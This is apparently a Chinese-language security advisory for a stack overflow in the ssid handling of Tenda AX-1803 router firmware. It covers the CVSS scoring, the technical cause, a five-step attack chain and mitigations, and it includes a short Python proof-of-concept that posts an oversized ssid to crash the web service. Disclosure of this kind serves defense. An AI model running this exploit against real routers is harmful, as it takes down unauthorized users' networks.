CVE-2025-70651 Tenda AX-1803 form_fast_setting_wifi_set函数ssid参数栈溢出导致拒绝服务

漏洞信息

漏洞编号

CVE-2025-70651

漏洞类型

栈溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AX-1803 v1.0.0.1

漏洞概述

CVE-2025-70651是Tenda AX-1803 v1.0.0.1路由器固件中存在的一个高危安全漏洞。该漏洞位于form_fast_setting_wifi_set函数的ssid参数处理逻辑中，由于对用户输入的ssid参数缺乏有效的长度校验，当攻击者通过精心构造的超长字符串作为ssid值发送请求时，会触发栈缓冲区溢出。攻击者无需任何认证即可利用此漏洞发起攻击，成功利用后可导致路由器服务崩溃，造成拒绝服务(DoS)状态。此外，栈溢出漏洞在某些情况下还可能被攻击者利用来执行任意代码或获取系统控制权限。该漏洞的CVSS评分达到7.5分，属于高危级别，攻击复杂度低，无需特殊权限或用户交互即可实现攻击，对路由器的可用性造成严重影响。Tenda AX-1803是一款面向家庭和小型办公环境的WiFi 6路由器，被广泛应用于家庭网络环境中，该漏洞的存在使得大量使用该设备的用户面临网络安全风险。

技术细节

该漏洞的根本原因在于Tenda AX-1803 v1.0.0.1固件中form_fast_setting_wifi_set函数对ssid参数的处理存在栈缓冲区溢出问题。在该函数的实现中，程序在栈上分配了固定大小的缓冲区来存储ssid参数值，但在将用户输入的ssid复制到该缓冲区时，未进行充分的长度检查。当攻击者发送包含超长ssid字符串的HTTP POST请求时，恶意数据会超出栈缓冲区的边界，覆盖相邻的栈内存区域，包括函数返回地址、保存的寄存器值等关键数据。攻击者可以通过精确控制溢出数据来操纵程序执行流程，例如覆盖返回地址使其跳转到恶意代码或现有函数（如system()）的地址。由于该漏洞存在于Web管理接口的处理函数中，攻击者可以通过发送精心构造的HTTP请求到路由器的Web服务端口（通常为80或8080）来触发漏洞，无需任何认证凭据即可利用。成功利用后，路由器进程会崩溃或进入不可用状态，导致WiFi功能中断或整个设备需要重启才能恢复。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标为Tenda AX-1803路由器，并确定其IP地址和Web管理接口端口（默认80端口）

STEP 2

步骤2

构造恶意请求：攻击者构造包含超长ssid参数的HTTP POST请求，数据包发往/goform/form_fast_setting_wifi_set接口

STEP 3

步骤3

发送攻击载荷：攻击者向目标路由器发送恶意请求，由于ssid参数缺乏长度校验，超长字符串触发栈缓冲区溢出

STEP 4

步骤4

内存破坏：溢出的数据覆盖栈上的返回地址和保存的寄存器，破坏程序执行流程

STEP 5

步骤5

拒绝服务：路由器Web服务进程崩溃或进入异常状态，导致WiFi功能中断或设备需要重启

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-70651 PoC - Tenda AX-1803 Stack Overflow in form_fast_setting_wifi_set
# Target: Tenda AX-1803 v1.0.0.1
# Vulnerability: Stack overflow in ssid parameter of form_fast_setting_wifi_set function
# Impact: Denial of Service (DoS)

target_ip = "192.168.0.1"  # Default Tenda router IP
target_port = 80
target_url = f"http://{target_ip}:{target_port}/goform/form_fast_setting_wifi_set"

# Generate payload with oversized ssid parameter to trigger stack overflow
# The exact buffer size needs to be determined through reverse engineering
# Typical stack buffer sizes in embedded devices range from 64 to 256 bytes
overflow_length = 1024  # Length sufficient to overflow typical stack buffer
payload_ssid = "A" * overflow_length

# Construct the malicious request
data = {
    "ssid": payload_ssid,
    "password": "test123456",  # Valid password to pass basic validation if any
    "security_mode": "wpawpa2psk"
}

print(f"[*] Sending exploit payload to {target_url}")
print(f"[*] Payload length: {overflow_length} bytes")

try:
    response = requests.post(target_url, data=data, timeout=10)
    print(f"[*] Response Status: {response.status_code}")
    print("[*] Exploit sent. If vulnerable, the device should crash or become unresponsive.")
except requests.exceptions.RequestException as e:
    print(f"[*] Request failed or device is unresponsive: {e}")
    print("[*] This may indicate successful exploitation.")

影响范围

Tenda AX-1803 v1.0.0.1

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 禁用路由器的远程Web管理功能，仅通过本地局域网访问；2) 启用路由器防火墙，限制对80/8080端口的访问来源；3) 监控路由器日志，关注异常的WiFi配置请求；4) 考虑使用备用路由器或临时使用其他品牌设备；5) 定期重启路由器以恢复可能的异常状态；6) 加强对网络流量的监控，及时发现和阻断恶意请求。